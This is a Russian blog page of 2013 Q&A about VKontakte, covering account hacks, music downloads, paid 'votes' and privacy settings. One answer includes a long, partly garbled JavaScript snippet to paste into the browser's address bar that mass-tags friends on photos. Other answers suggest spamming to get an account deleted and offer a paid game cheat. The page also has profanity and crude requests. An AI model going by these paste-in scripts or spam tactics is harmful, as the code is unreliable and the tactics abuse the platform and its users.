суббота, 13 апреля 2013 г.

Можно ли ВКонтакт зайти без регистрации? Подруга пригласила фото посмотреть - чайники обе



Точно нельзя...моя подружайка специально открывала страницу и даже что-то заполняла....Фотки можно посмотреть только заполнив страницу на какой-то минимум.

Создала страничку ВКОНТАКТЕ, для моей собаки....вот скажите, НА ФИГА??? А вы как фигней страдаете? ))

какой подарок вконтакте вам НЕ нравиться?

как слушать музыку вконтакте с samsung s 5330. как слушать музыку вконтакте с samsung s 5330

у меня оригинал воспроизводит стондартным браузером только иногда памяти не хватает

как по английски сказать: я хотела - бы стать официальным представителем вашей группы вконтакте?

У Марго неправильно, у нее написано, Я хотела (когда-то давно) быть официальным... Правильно будет так: I would like to be the official representative of your VKONTAKTE group

Как вконтакте сделать ссылку на группу? .

понятней вопрос задай. если ее отправить скапируй и отправь,если группу сделать то это легко просто пошарься я просто не помню ща...

Вконтакте. Как стать знаменитым в вконтакте ну там много друзей иметь и т д

Сначала засветись-прославься на экране, чтоб был узнаваем, тогда толпы возжелающих быть твоим другом будут добавляться, напрашиваться в друзья в контакте.

Вконтакте. Отправил человеку анонимно подарок, захожу на его страницу, в раздел подарки и там написано от меня. Что это?

это только вы видите...что вы отправили подарок....а остальные нет) не понятно?

Помогите!что делать если на страницу вконтакте не зайти,а пароль на почту не приходит!??

А ты точно ввёл всё правильно? Если да, то попробуй обратиться в службу поддержки. Ну или у Павла Дурова спроси, если ответит.

Покидайте айди шалав из вконтакта

Моя страница вконтакте была взломана,просят сменить пороль,но потом пишут,что К этой странице привязан другой номер???

Если там слова, что администрация сайта изменила пароль в связи с взломом вашей страницы и бла-бла-бла, с просьбой выслать смс ,для присвоения Вам нового пароля. То у Вас вирусняк, как его победить я так и не понял, помогла только смена винды.

нажимаю на картинку вконтакте,а она вместо того чтобы открыться,спрашивает куда сохранить.что это и как убрать?

нажимай левой кнопкой мышки, а не правой!

Отчего вконтакте входит только в Хроме (Опера, Мозилла слетает как бы)?? А у вас как?

потому что новый браузер Хром разработчики решили проПИАРИТЬ, типа самый быстрый, надежный, удобный и т.п. тем не менее - у народа возникает куча проблем с Хромом (почитайте предыдущие комменты на похожий вопрос) я выхожу вконтакт с любого браузера без проблем.

Посоветуйте интересные сайты кроме маил.ру, вконтакте и одноклассников!

http://www.diary.ru/это дневники, мож попробовать!!! Не так интересно самой писать, как можно читать то, что пишут другие!!! ))) Честно интересно!!!

Нравятся ли вам такие сайты, как Одноклассники.ру или вконтакте?

Одноклассники нравятся, я там нашла много людей, связь с которыми прервалась лет 10 назад.

посоветуйте программу для скачивания музыки из вконтакта без вирусов!

Браузер Maxthon 3 умеет скачивать музыку из Вконтакта безо всяких левых приблуд - для этого есть встроенный Снифер: и есть также плагин VK_MP3, там вообще просто:

Посоветуйте интересную игру вконтакте=)

вк нет норм игр,ставь доту или пройди скайрим

Скажите люди добрые!!!!можно вконтакте как-то узнать кто был на твоей странице????

К счастью нельзя. Да и к чему следить за людьми? Если не хочется чтобы на страничку кто-то заходил её можно заблокировать от тех кто не в друзьях.

Что такое голоса вконтакте, зачем они нужны, и как их получать?

Голоса вконтакте это что-то вроде денег этой соц.сети.Они нужны для того,чтобы отправлять подарки,использовать их для различных приложений,поднятия рейтинга.Получить их можно через терминалы,он-лайн деньги и смс.

Просто необходим ответ...

меня взломали вконтакте,пишет то что от меня рассылается спам введите старый и новый пароль,да? потом пишет чтобы я ввела свой номер и мне присали код... с меня снимут деньги,кто знает?( Добавлено 2 года назад БУДУ ЛЕЧИТЬ КОМП! точно код не надо отсылать?)

подскажите программу для пиара Вконтакте

Пиарограмма

Вы смотрели фильм ТЕХНОЛОГИЯ СПАИВАНИЯ (2012 год)Такого не покажут по ТВ!. Фильм можно найти вконтакте, на ютубе.

СпаРивания? Спаивания? Так про ЭТО или про водку?

Друг взломал вконтакт мой вконтакт !! Как бы изящнее отомстить ?!

Он не только его взломал но и всякую пошлость всем разослал !!!

10 баллов за ответ! Как на сайте Вконтакте просматривать фотографии, которые защищены настройками приватности?

к сожалению никак наверна)))меня вот тоже эта ерунда заботит)))

кто нибудь может мне скачать видео из вконтакте? у меня нет програмы для скачивания музыки и видео! срочно нужно!!!!

VKMusic - программа для поиска и последующей загрузки на компьютер аудио и видео файлов залитых пользователями таких популярных ресурсов, как: социальная сеть В Контакте, YouTube, Mail.ru... http://www.softportal.com/software-11843... Дополнение твоё не прочёл... пиши на почту...))

как пополнить голоса вконтакте через WebMoney

Ищите терминал, тыкаете на нужные кнопочки и у вас появляются голоса в вк

Регистрация ВКонтакте бесплатно, но осуществляется по приглашениям. Дуров не боится экспериментов и изменений - молодец?

Изначально была регистрация по приглашениям. Потом её отменили и ввели опять. Так что ничего нового.

почему я не могу зайти в свою страницу вконтакте? там написано, что моя страница заблокирована и я отравляла спам???

Научитесь пользоваться поиском. Это вирус. Зайди в C:\WINDOWS\system32\drivers\etc там файлик hosts(Открыть блокнотом). В нём ничего не должно быть кроме строчки внизу 127.0.0.1 localhost. Если что-то там ещё есть, то удали и оставь эту строчку 127.0.0.1 localhost. Мой тебе совет: Поставь нормальный антивирусник, но не Nod32 и не Аваст. У меня стоит Kaspersky Internet Security 2010 и никаких проблем нет ни с контактом ни с одноклассниками ни с другими сайтами Если не получается, то скачай и установи fix: http://download.microsoft.com/download/9... После установки фикса перезагрузи компьютер. И всё. Теперь проблема должна исчезнуть.

Как скачивать музыку с Вконтакте?

Скиньте программу=)!!!

где можно бесплатно раздабыть голоса вконтакте?

Тут как то один чел говорил что есть сервис дарят немного голосов. А так ты негде малиново ниче не возьмешь и даже не думай проги качать вк ну которые накручивает щетчики и все подобное такого нет есть токо проги которые тебя ломают. Прога там типо накрути рейтинг тебя просят вести данные ты вводишь и они уже у другова человека потом вводишь скоко чего и как бы получается что пользователь недогадывается о том что его аккаунт взломали (Такую прогу можно сделать за 10 минут + офомление)

Простой вопросС:. Как назвать группу вконтакте о моем классе? Класс 8А Подкиньте пожалуйста пару названий:)

ВосьмиАшки хороший вариант. Только без звёздочек, чёрточек, повторяющихся буковок и т.п....:))

Меня взломали вконтакте и просят что бы я отправил 674381777 на номер 4016.

http://aykinfo.ru/news-view-40.html права Администратора (может понадобиться). сделать это : http://support.microsoft.com/kb/972034/r... автоисправление hosts: ссылка «Fix it» --в Загрузки--установить (для лиценз. Windows); __Если не помогло: hosts может быть СКРЫТ и ПОДМЕНЁН из-за вируса ( http://remnabor.net/falshiviy-fail-hosts... ) Пуск -- Панель управления -- Все элементы панели --Параметры папок -- Вид -- Показать скрытые папки и файлы. Потом смотреть hosts: Пуск-Выполнить(Найти..)- notepad %windir%\system32\drivers\etc\hosts -строчки, которые обнаружатся за текстом с ## ниже строки 127.0.0.1 localhost (а для Win7 - ниже # ::1 localhost) -- НАДО УДАЛИТЬ, закрыть с сохранением изменений, перезагрузиться. http://www.comss.ru/page.php?id=67 и http://www.comss.ru/page.php?id=84 поищут причину (не мешая работе других антивирусных программ на компьютере). Рекомендуется Полная проверка. Почистить cookie и кэш http://www.comss.ru/page.php?id=269 CCleaner (б/пл) http://www.commix.ru/security/virus-vali... валидация ОК, VK... утилита AVZ++ .

как слушать музыку Вконтакте. подскажите как слушать музыку в паблике,чтоб она подряд шла?

а ничо что она и так подряд идет,нэ?0-о

Зачем бабы фоткаются в позе рака, сломанной березы, а потом жалуются что во вконтакте им пошлят и предлагают потрахаться

А где фото? А где береза сломанная?

Подскажите программу для автоматической отправки сообщения с картинкой в группу в Вконтакте

Вот эта программа http://vkbot.ru/ отправляет

стоит ли опосаться взлома страницы вКонтакте, если пуступают такие угрозы? или просто не обращать внимания на них?

смените пароль на странице, ввод нового пароля(10 символов) вводите с виртуальной клавиатуры она находится в вкладке пуск-служебные-специальные возможности называется экранная клавиатура, и тогда если Ваш комп инфицирован кейлогером (клавиатурный шпион) то он не считает ввод пароля, а вообще лучше не отвечать на никакие письма не проходить по ссылкам, поставить софт для защиты компа, против спама, траянов и нормальный антивирь, отключить не нужные службы при запуске компа, что бы не открывались не нужные порты, это по взлому с вашей стороны....

Стиоит ли заказывать Вконтакте одежду ?

Просто Вк есть такие как бы интернет- магазины. И большинство из них требует перевод через киви или через банк. Мне моя знакомая говорит что это всё лохотрон.Просто при оформлении заказа мне написали, что нужно перевести деньги в банке . Но по идее оплачивать же надо на почте?! И мне вот как то не по себе. Скажите, стоит или не стоит там заказывать????

как отправить сообщение вконтакте если человек ограничил круг лиц способных это делать? очень надо(((

Попроситься к нему в друзья прикрепив при этом текст сообщения

Проблемы с Вконтакте

При в ходе через ПК появляется это #1 при том что с телефона вход нормальный. Замечание: при вводе в поля логин и пароль ЛЮБЫХ БУКВ и символов появляется то же #1если вводить эти же символы с телефона, то #2 Что делать?

беременяшки,а у вашего пузожителя уже есть страничка Вконтакте,Одноклассничках? :)

у моего был,он когда родился я в статусе написала откинулся на свободу

Стоит ли дружить с незнакомыми людьми Вконтакте?

нет, нафига они тебе? друзья могут быть только реальные, а не виртуальные

Вопрос о вконтакте. За что дают голоса вконтакте и зачем они нужны. Что такое рейтинг как его повисить и зачем он нада.

Голоса вконтакте это внутренняя валюта сайта,за них можно дарить друзьям подарки,покупать что то в различных приложениях на сайте,рейтинг повышается до 100 % за заполнение информации,дальше через голоса,рейтинг влияет на позицию вашей анкете при выведении в поиске.Чем больше рейтинг , тем выше ваша страница.

Для знающих сеть вконтакте!

Два вопроса(если ответите на оба, буду очень признателен): 1. Какой код надо написать, чтобы человек при нажатии на ссылку переходил на свою страницу? 2. Как сделать ссылку обзор фото в группе?

Где скачать программу чтобы поднять лайки вконтакте бесплатно? Скиньте ссылку.

Пойти нахуй из раздела программирования, потому что школярам, дрочащим на лайки как последние уебаны, тут делать совсем нехуй.

как вконтакте отправить человеку аудиозапись, ну или хотя бы на стену?

прикрепите к сообщению или зайдите к нему на страницу и там, где добавляется запись на стену, просто выберите добавить аудиозапись. Само собой перед добавлением убежитесь, что нужная аудиозапись есть у вас в списке.

Как пополнить голоса вконтакте через вебмани?Пишет что нужно устанавливать Keeper а можно без него?

не через вебмани

Как познакомится с девушкой вконтакте?

вконтакт -это не сайт знакомств.

Игра ВКонтакте Вормикс.Какая раса лучше на ваш взгляд???

Есть ли в социальных сетях настоящий звёзды такие как Майли Сайрус и Селена Гомес?(Mail.Ру,ВКонтакте,одноклассники)

Не так давно Майли и Лиама встретили поклонники и настояли на том что бы Майли ответила на их главный вопрос Есть ли ты в социальный сетях таких как:майл.ру,одноклассники,и ВКонтакте.По лицу Майли она не хотела ничего говорит но сказала лишь одно:Да я есть на этих социальных сетях но их адрес я не скажу!Поклонники этому обрадовались и попросили даже умоляли дать адрес электронной почты на майл.ру.Майли дала и при этом сказала:Остальные адреса я не скажу!Адрес На этом разговор поклонников и Майли завершился.

Кто есть вконтакте,вы играите в эти идиотские приложения типа фермы,лилипутии?Люди сошли с ума))О_о))))

Я играла в аквариум и каждый день и не по разу заходила кормить рыбок, потом одумалась и удалила нахрен эти приложения)))

у вас сайт ВКонтакте работает?

как то частично, страница открылась, новости нет, приложения работают, диалоги нет...Теперь это будет нормальным явлением!

Могут ли ВКонтакте мои скрытые друзья писать мне сообщения?

конечно

как вконтакте можно узнать в онлайне человек или нет не заходя на сайт? это вообще возможно?

можна, юзай жабер

Где можно скачать бесплатную прогу для повышения сердечек вконтакте без смс проверки и регистрации ?

Таких не бывает, а все что есть тупо своруют твой аккаунт.

Кто-нибудь знает, откуда взялась эта картинка в вконтакте?

Да! Меня тоже интересует этот вопрос.Видела неоднократно,кто такой не знаю)

стоит ли регестрироваться вконтакте?

меня все чаще стал волновать этот вопрос...мои друзья и одногрупники зарегестрированы там.Друзей у меня не очень много и я не знаю стоит ли мне регестрироватся там?Просто если я зарегестрируюсь я буду как бы лохушкой, у менябудет мало друзей мало фоток видео о прочей фигни.Как относятся люди к тем кто нигде не зарегестрирован??? Считаете ли вы таких людей как я отшельниками и нелюдимыми?

Как удалить приложение из Вконтакте

Зайти в приложения и нажать крестик на приложении вверху справа навести курсор

Если человек не заходит вконтакт уже 20 дней. ЧТо с ним могло случиться? ?

думаю стоит позвонить и узнать...а вдруг что то произошло...

А ЧЕ ВКОНТАКТЕ СПРАШИВАЮТ Религиозные взгляды....ЕСТЬ ЖЕ КАКАЯ-ТО СТАТЬЯ ...ЭТО Ж ЛИЧНОЕ

Ну это же не главное тербование.КТо-то пишет кто-то нет, кто-то хочет чтобы все знали что он мусульманин, кто-то хочет чтобы все знали и видели что он православный... Чтобы к атеисту не лезли с религиозной тематикой например...

Как посмотреть список гостей вконтакте?

Как удалить страницу вконтакте?

Настройки - приватность-(кто может просматривать) никто (удалить). Но она не исчезнет. Ты сможешь ее восстановить в любой момент. Просто никто не сможет ее просматривать

у меня телефон htc hd2 не хочет показывать видео в youtube и вконтакте через opera что делать

Форматировать видео

Кто-нибудь знает где в интернете можно найти информацию о человеке,

Смотря какая информация вам нужна и смотря о каком человеке. А если серьёзно то о простом гр-не РФ вы ничего не найдете если только купить базу данных МВД =) но в большинстве случаев развод и уголовно наказуемо

Как сделать так чтобы быть постоянно онлайн вконтакте? я слышала что можна как-то через хром. Подскажите пожалуйста.

Пишешь скрипт на PHP, который коннектится к вконтакту через cURL, загружаешь его на свой хостинг, ставишь выполнение скрипта с помощью cron на определенный интервал времени.. PROFIT

Сеть ВКонтакте ограничила свободную регистрацию. Как вам это?

Согласен с Альбертом Фахретдиновым. Это сделано в связи с тем что много регистрируются роботов ссылка http://www.vokrugsveta.ru/news/11271/

Где можно скачать программу для взлома сообщений вконтакте

Нигде.Такой программы не существует.

При входе вконтакт выбивает ошибку времени что делать?

каждый день когда я захожу с google croma мне выбивает ошибку времени, хотя время настроено провильно

Люди добрые как раскрутить группу Вконтакте?.Кто знает как можно приглашать массово в группу людей?

.Кто знает как можно приглашать массово в группу людей? Добавлено 2 года назад добовляйтесь всегда будем рады!

ваажноо ! проочитай ! Как сделать аву для вконтакте чтобы когда нажимаешь на нее ,картинка менялась ?

Добавь новую не удаляя предыдущую.

В чем заключается сходства и различия ответов с вконтакте?

Не знаю, не приходилось бывать в контакте.... Хотя есть одно неприятное свойство у обоих : люди выставляют то, что по определению нельзя. Нельзя НИКОМУ позволять нарушать ЛИЧНОЕ пространство. На то оно и ЛИЧНОЕ, В Библии об этом прекрасно и жёстко сказано....И не только в Библии.

Как добавить ВКонтакте друга в группу если нет строчки добавить друзей

Значит это закрытая группа. Из таких групп нельзя приглашать. Только если ты модератор в этой группе, то можно. Это я тебе как модератор закрытой группы отвечаю)

Знает кто нибудь читы для Wormix(Приложение Вконтакте)?Напишите плиз?! Напишите плиз!

есть такая программа чарлез почитай про неё в инете

ICQ, вконтакте. Как быть с людьми которые кроме привет и как дела? ничего не могут написать?

удалять их не хочется - обидятся (потому что вживую знаком с ними и изредка встретившись общаюсь), интереса с ними общаться тоже нету, когда стоит статус ЗАНЯТ они пишут ПРИВЕТ, после как я освобожусь я им отвечаю, ..ну и так каждый день почти)))) отвечать мне на их ПРИВЕТы не хочется (лень), потому что знаю что больше они врядли что нибудь напишут. Добавлено 1 год назад ну или поставить можно автоматическое сообщение: привет, нормально! отдыхаю! )))))) ...и не отвечать на эти сообщения

Как говорят вконтакте...

Подскажите пожалуйста;) Какую интересную группу можно создать вконтакте???)

В Контакте можно создать группу про юмор,смех,приколы так как в так группы заходят очень много людей и эти группы популярные.

Сколько еще времени висит надпись Онлайн вконтакте когда выйдеш оттуда. она там не сразу пропадает

минуты три-четыре.в отличие от майла и одноклассников не долго

как узнать кто посещал твою страницу в вконтакте? (есть вроде приложение такое)

Есть, такое - vkontakte.ru/app649574 - и такое - vkontakte.ru/app638461

Как удалить страницу в вконтакте?Знаю,что в настройках общеее

Можно попробовать такие способы удалить страницу В контакте: 1. Идем в «Приватность», везде ставим «Только я». Потом возвращаемся на свою главную страницу и удаляем все, что есть: музыку, видео, телефоны и другую информацию о себе. Через некоторое время появится надпись: «страница удалена…». Также не забудьте отключить все оповещения на всякий случай! Выходим. 2. Начинаете активно спамить, материться в популярных группах, на странице Павла Дурова и т.д. такие спам-аккаунты удаляют быстро без разбирательств :) 3. Способ №3: — регистрируем новый почтовый ящик — меняем в контакте е-мейл на новый — удаляем только что созданную почту — удаляем друзей, фото, видео, аудио, стену и т.д. — меняем имя и фамилию — меняем пароль от контакта на произвольный, который не запомните (возьме номер случайного телефона из телефонной книги) — в настройках - приватность- меняем все на «ТОЛЬКО Я — выход Через месяц, т.к. Вы не заходил, Вы будете удалены полностью!

А почему у меня не открываются ни одноклассники, ни вКонтакте? или я чот ступила...

Возможно скачали программы для накрутки рейтинга или для чтения чужих сообщений, они обычно идут в комплекте с вирусами. Попробуйте зайти на свои страницы с компьютера подруги, если там будет все нормально - лечите свой комп от вирусов.

как взломать приложение вконтакте МАРКЕТ СИТИ, на звездочки и деньги?

есть прлграммка,но денег стоит.если ты не жадный на бабло.то,могу скинуть.недорого.пиши,договоримся

Не могу войти Вконтакт, изменяю по найденной инструкции файл host, но комп не дает сохранить изменения-

Нужно перегрузиться в безопасный режим и зайти с учетной записи Администратора. Там и выполните спокойно нужные изменения. Подчеркиваю - В БЕЗОПАСНОМ РЕЖИМЕ.

Пропал аватар вконтакте.Как вернуть?

Поставить Новый Моя Страница>Редакт Фотография

Какие еще соц.сети существуют кроме: Вконтакте, Майл.ру, Вопросы, Мир Тесен?=)

Фотострана, Твиттер, Фейсбук, Май Спейс....китайскую забыл название

На каком сайте можно найти одежду которую продают вконтакте распространители как эта девушка

Не советую покупать что то вконтакте!Могут оказаться обманщиками!Есть проверенные интернет магазины: http://www.tinydeal.com/ru/ http://rutaobao.com/ http://www.wildberries.ru/ http://www.lamoda.ru/ http://www.quelle.ru/ Из Американских с доставкой в Россию: http://www.asos.com/Women/ www.newlook.com http://www.topshop.com/ http://www.romwe.com/

Анимирываная картинка Вконтакте.. Можноли на стену кинуть анимирываную картинку, и как это зделать?))

можно. нажимаете Прикрепить, выбираете картинку и нажимаете отправить

Глупо,но все же((Написала статус вконтакте я не кривлю душой а МЧ обгадил как мог,неужели правда глупость сказала?((

Есть замечательная народная мудрость: На дураков не обижаются.

Вконтакте. Здравствуйте. Хотела бы узнать, как вконтакте передавать голоса?

Катя,смотри и выбирай: http://search.otvet.mail.ru/?q=как+вконтакте+передавать+голоса?st=search

как вконтакте отметить всех друзей на фотке сразу???

Скрипт работает под Mozilla Firefox, под IE и Оперой не работает.Для того, чтобы отметить всех друзей на фотке, надо:1. Откройте любую фотографию в вашем альбоме2. Нажмите кнопку Отметить, чтобы подгрузился список ваших друзей3. Вставьте в адресную строку следующий код. Только не забудьте убрать пробел в java scriptjava script:(function() { function getPhotoInfo() { if(res = /id=(\d+)_(\d+)/.exec(location.href)) return {mid: res[1], pid: res[2]}; else return {mid: 0, pid: 0}; } function getMyID() { var anchs = document.getElementsByTagName(a); for(i = 0; i < anchs.length; i++){ if(res = /id(\d+)/.exec(anchs.href)) return res[1]; } return 0; } window.adostes_mark = function(i){ if(friends == undefined || i >= friends.length){ if(rotating = document.getElementById(rotating)) rotating.innerHTML = lt;h4gt; All friends have marked on this photo!lt;/h4gt;; window.clearTimeout(window.adostes_timer); return; } request_uri = http :// vkontakte. ru/board.php?act=topictid=3850210[id]+name=+encodeURI(friends[name])+add=1x=+(Math.random()*100)+y=+(Math.random()*100)+x2=+(Math.random()*100)+y2=+(Math.random()*100); img = new Image(); img.src = request_uri; if(commentArea = document.getElementById(commentArea)) commentArea.innerHTML = i + of + friends.length + friends marked!; var new_index = i+1; window.adostes_timer = window.setTimeout(window.adostes_mark( + new_index + ), 500); }; window.adostes_markallf = function(){ if(!friends){ alert(Click \Mark human\!); return; } if(!confirm(Are you sure want to mark all friends?\r\nAuthor: Nikolay Khodov (id5500005))) return; if(rotating = document.getElementById(rotating)) rotating.innerHTML = lt;h4gt; Processing Please wait...lt;/h4gt;; window.adostes_timer = window.setTimeout(window.adostes_mark(0), 0); }; var mid; var pid; var myid = getMyID(); var info = getPhotoInfo(); if(!(location.href.match(/) location.href.match(/photo/))) { alert(Open page with your photo); return; } window.adostes_pid = info[pid]; window.adostes_mid = info[mid]; adostes_markallf(); })();4. Нажмите Enter и ждите: в области ввода комментария отображается процесс отмечания.-------------------------------------------------------------------------------------------------------------Отметить всех друзей на видео:1) перейти к видеозаписи, на которой хотите отметить всех друзей2) нажать кнопочку отметить, чтоб высветился список ваших друзей3) в вверхней левой строке, вместо текущего адреса пишете:java script:for(blabla=0;blablalt;5000;blabla++){ var elem = document.getElementById(f+blabla); if(elem == null) break; elem.onclick(); }4) в слове javasсript удаляем пробел5) жмём Enter и готово, друзья отмечаются сами

Помогите!Вконтакте в добро пожаловать написано введите логин а че писать-то?(не имейл)Фамилию?или че?

Вам нужно чтоб кто то из зарегистрированных пользователей отправил ссылку на регистрацию..и только через нее вы сможете зарегистрироваться! Создатель Контакта Павел Дуров поставил защиту просто так не как не зарегистрируетесь. После этого вам придет ссылка и вся регистрация как в майле….

подскажите как повисить рейтинг вконтакте????очень надо!

Бесплатно и без смс - это только получить голоса, приглашая друзей в какое-нибудь приложение. Приглашая друзей, очень много голосов не заработаешь (15-20 друзей = 1 голос), но зато правда бесплатно, а всё остальное - лохотрон.Трояна не поймаешь, т. к. не устанавливаешь ничего к себе на компьютер, никаких исполняемых кодов скачивать не надо.Я получаю голоса в этой игре Добавь к себе на страницу вконтакте и начинай приглашай всех подряд :)(Играть не обязательно, надо просто добавить)

я слышу голоса вконтакте, это нормально?

у тя чё глюки что ли ты что мухомора наелся или что .Голоса вконтакте - это как деньги , их можно пополнять но слышать нельзя

Если вконтакте на мою страницу зайдут с другого компа, а я в это время буду сидеть у себя на странице, я об этом узнаю

Мои настройки - вкладка Общие - Безопасность Вашей страницы - смотрите историю активности. Там покажет Браузер, Айпи, Страну и Время. Если Вы точно знаете, что у Вас один диапазон айпи, а вошли с другого, или вошли с того браузера, с которого Вы никогда не заходите, то это, конечно, палево.

Как ВКонтакте Зделать в группе Вики-Страницу ???

В школе. В книге Русский язык, 6 класс. Там написано, как писать слово сделать. Про вопрос - в вконтактике есть сама разметка страниц, даже есть приложение. Стоит только поискать ;)

как скачать игры в вконтакте

Вконтакте игры не скачиваются. Там только приложения и они работают по сети

почему сегодня не могу зайти в вконтакте?

Не могу зайти на сайт ввконтакте, причины?? Вроде вирусов нет, на остальные сайты с легкостью захожу, а на этот не могу. а у вас как?

Подскажите, пожалуйста, программу для скачивания музыки и видео из ВКонтакте, и как, где ее можно найти?

Компьютер работает на Windows 7. Добавлено 5 месяцев назад Всем спасибо, попробую все предложенные варианты.

подскажите плиз как вконтакте отметить всех друзей ?

На фото если отметить, то смотри здесь как. ;-) Если же на видео - смотри тут. ;-)

Скачивание музыки с соц. сети Вконтакте...

Скажите пожалуйста, какой программой лучше скачивать музыку Вконтакте. (Только что-бы рядом с аудиозаписью в браузере было написано скачать)

Социальная сеть Вконтакте

не понял суть вопроса )) ты про чё вабще?

вобще можно ли познакомиться в соц сети например Вконтакте, на тот случай если мало свободного времени.

знакомство ради знакомства?

привет всем!как узнать e-mail человека, который вконтакте зарегистрирован, но у него страница и все остльное скрыто?

Если не хочет-значит не хочет показивать e-mail!



Комментариев нет:

Отправить комментарий